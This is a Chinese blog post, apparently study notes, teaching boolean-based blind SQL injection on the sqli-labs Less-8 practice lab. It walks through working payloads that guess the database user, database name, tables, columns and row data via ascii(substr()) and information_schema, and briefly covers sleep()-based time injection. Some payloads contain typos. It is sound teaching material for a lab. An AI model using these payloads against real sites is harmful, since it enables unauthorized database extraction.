SQL盲注--基于布尔类型的注入 2018/11/14

最新推荐文章于 2024-02-20 17:52:23 发布
最新推荐文章于 2024-02-20 17:52:23 发布
阅读量655 收藏
点赞数
分类专栏: 渗透测试入门 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43689084/article/details/84075634
版权 
    在一些站点隐藏了错误信息的情况下,联合查询以及报错注入的方法均无法注入出数据的时候,需要用到盲注的方法来进行注入。
   基于布尔的盲注是根据页面差来进行判断和数据注入的。在存在注入的页面输入and(true)则返回页面1;输入and(2)则返回页面2.而页面1和页面2有差别,常见的情况是页面1是正常页面,页面2是错误页面。
    substr(str,pos,len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始的。
    大致形式为 id =1‘ and 1(这里的1为select语句替换) = 1(这里的1为实际判断长度替换)

下面是实验:
1,判断当前数据库用户名的长度(用于逐位猜测用户名)。
http://127.0.0.1:8010/sql/Less-8?id=1’ and (select length(user()))=14 --+ //可以看到当前数据库用户名长度为14,有必要提一下这里的user()和database()一样是一个函数,指当前数据库用户名。
在这里插入图片描述

2,逐步猜解当前数据库用户名
and(select ascii sunstr(user(),1,1)) =114 --+ //这里用ascii码值返回用户名,返回的为用户名第一个字节的ascii码值,可以通过ascii转码得出第一位为r。之后一共还有14为数字,把user()后面的数字一次从1改到14判断即可,这里不再一一列举,用户名为root@localhost

在这里插入图片描述
在这里插入图片描述

3,判断当前数据库长度
and(select length(database()))=8 --+
在这里插入图片描述
4,逐步判断当前数据库的名字
and(select ascii(substr(database(),1,1)))=115 --+//经ascii转换可知第一为为s,依次转换下去即可知当前数据库为security在这里插入图片描述

5,判断security数据库中有多少个表名,即有多少个表
and(select count(table_name) from information_schema.tables where table_schema = ‘security’)=4 --+ //这里count()指获取数量,已经判断出security数据库下有4个表
在这里插入图片描述
6,猜测第一个表的长度,从而逐步猜测第一个表的各个表名。
and(select length(table_name)from information_schema.tables where table.schema=‘security’ limit 0,1)=6 --+ //这里limit表示从第一行开始输出,一共输出一行
在这里插入图片描述
7,逐步猜测第一个表的六个字符
and(select ascii(substr(table_name,1,1) from information_schema.tables where table_schema = ‘security’ limit 0,1)= 101 --+ // 这里判断出第一个字符为e 修改table_name后的参数为2,3,4,5,6可以依次查看出此表的剩下字符,修改limit后的参数依次为1,2,3。可以将查看的行数依次移到2,3,4行。经查阅此表全名为emails。
在这里插入图片描述
8,猜测表emails有多少个字段,即有多少个列名
and(select count(column_name) from information_schema.columns where table_name =‘emails’)=2 --+ //这里判断出有两个字段
在这里插入图片描述
9,模仿刚才查看表明的方法,依次判断字段长度
and(select length(column_name) from information_schema.columns where table_name = ‘emails’ limit 0,1)=2 //不难判断出emails表下有两个字段
在这里插入图片描述
10,根据刚才判断表名的方法来判断列名
and(select ascii(substr(column_name,1,1)) from information_schema.columns where table_name=‘emails’ limit 0,1)=105–+ //猜测出字段名为id,emails_id
在这里插入图片描述
11,依次猜测各字段下内容数量
and(select count(id) from emails)=8 --+ //可以看见id下有八条内容
在这里插入图片描述
12,从第一行开始依字段猜测内容
and(select ascii(substr(id,1,1)) from emails limit 0,1)=49–+ //猜测剩余表内内容,可依此修改substr()和limit中的参数 substr中的第二个参数代表从第几列输出,limit中的第一个参数代表从第几行输出。
在这里插入图片描述
至此,一次基于布尔的盲注就结束了。
包括基于时间类型的盲注,可以通过类似于
and if(1=1,(sleep(6),1)
and if(1=2,sleep(6),1)
来判断是否存在时间注入漏洞,这里sleep指的是休眠时间,即条件为真时休眠6秒执行,否则1秒后即执行。
和本文的and 1=1查看返回页是否相同是类似的方法,就不再一一细述。

本文仅为笔者笔记,如有差错请及时联系更正,欢迎大家共同交流学习心得,非常感谢!

Gypsies_97
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全:SQL注入布尔原理+步骤+实战操作
wangyuxiang946的博客
05-13 2231
这篇文章为大家解析布尔实现原理,结合实战案例讲解布尔使用步骤
SQL注入-基于布尔
Snowflake1997的博客
02-19 1353
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-8。访问的URL为: http://[靶机IP]/sqli-labs/Less-8/ 登录后,根据网页提示,给定一个?id=1的参数,即: http://[靶机IP]/sqli-labs/Less-8/?id=1 此时页面显示You are in...,显示状态未True。 如果给定一个?id=-1的参数,即: http:/.
东哥视频学习笔记——SQL手工注入布尔注入
gam0n的博客
08-28 386
1.mid(str,1,3)字符串截取,从第一个字符截取,取三个字符,即从第一个字符到第三个字符 2.ORD()转换为ascii码 3.length()统计字节长度 4.version()查看数据库版本 5.database()查看数据库名 6.user()查看用户名 一、获取数据库名长度: 通过单引号闭合前面sql查询语句, username=111' or length(...
SQL注入-布尔
acepanhuan的博客
02-10 1658
学习SQL注入方法之
SQL注入——布尔
heyingcheng的博客
03-07 692
当猜测是第一个字母的ascii码是115,页面显示为真,再查表,得出对应字母。后续的操作是依次猜解,陆续得出数据。布尔:Web页面只返回True真,False假两种类型,利用页面的返回不同,逐个猜解数据。页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。对方既没有回显位又没有报错,如果页面有真假值切换,我们就可以使用布尔。当我们猜解数据库名称的第一个字母的ascii是120,页面显示false。分类:布尔,时间,报错
SQL注入原理及实践(一)–SQL注入布尔注入
dulirongdudu的博客
08-02 2130
当不知道数据库返回值的情况下时【无回显】,输入1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔注入。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
SQL注入之基于布尔详解
09-10
布尔SQL的关键在于理解和利用服务器对查询结果的反应,通过一系列的逻辑判断和试错,逐步揭示数据库结构和数据。由于其隐秘性和复杂性,这种攻击方法对网站的安全构成了严重的威胁。为了防止布尔SQL,...
手工辅助注入工具Blind-SQL-Injector.zip
07-18
2. **类型**:分为基于时间的和基于布尔。基于时间的通过延迟服务器响应来判断查询结果;基于布尔则通过返回结果的不同(如页面内容改变或不变)来判断。 3. **常见检测方法**:常见的检测手段...
第九节 POST基于时间和布尔-01
09-15
POST 基于时间和布尔是两种常见的技术,Sqlmap 是一个功能强大的 SQL 注入工具。通过使用这些技术和工具,我们可以更好地检测和防御 SQL 注入漏洞。 知识点: 1. HTTP POST 方法的介绍 2. POST 基于时间...
sql注入 自学笔记 报错注入 二阶注入 布尔时间 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
超级SQL注入工具,支持布尔,报错,union注入
最新发布
03-27
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型、错误显示注入、...
sql注入整理之布尔注入
qq_37079022的博客
07-14 1742
1' and ascii(substr(database(),1,1))=1 -- 使用ascii将值变为数字。1' and substr(database(),1,1)='a' -- 显示 不存在。1' and substr(database(),1,1)='b' -- 显示 不存在。1' and substr(database(),1,1)='c' -- 显示 不存在。1' and substr(database(),1,1)='a' -- 显示 不存在。
SQL注入进阶:掌握布尔和延时注入攻击技巧
weixin_43263566的博客
01-21 4173
SQL注入篇 - 布尔及延时注入
SQL注入漏洞之布尔(Boolean)注入
m0_71109835的博客
02-01 1185
其一,前端传到后端的数据内容是用户可以控制的,如果这些数据不是用户可以控制的话SQL注入漏洞就无从谈起。其二:用户输入的参数可以拼接的SQL语句中,并且可以被执行。:SQL注入之所以得以存在主要是因为WEB应用程序对用户输入的数据没有进行有效的判断和过滤,从而导致用户的恶意SQL语句从前端传到后端,最后实现了对数据的窃取和破环。学习SQL注入首先要对一些常见的SQL语法有一定的了解,这样我们在使用SQL注入漏洞攻击对方时才能游刃有余。5.在得知数据库名字长度后,我们可以用穷举的方法猜测出数据库的名字。
布尔类型SQL注入
m0_64368365的博客
02-20 1486
布尔适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
SQL注入之路之二:布尔型(boolean)
weixin_62715196的博客
08-10 1110
简单描述什么是布尔以及对与布尔如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
SQL注入原理-布尔
T1ngSh0w的博客
09-15 2121
SQL注入原理-布尔+手写python脚本
SQL注入漏洞学习小结
dayouzi的博客
08-22 653
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值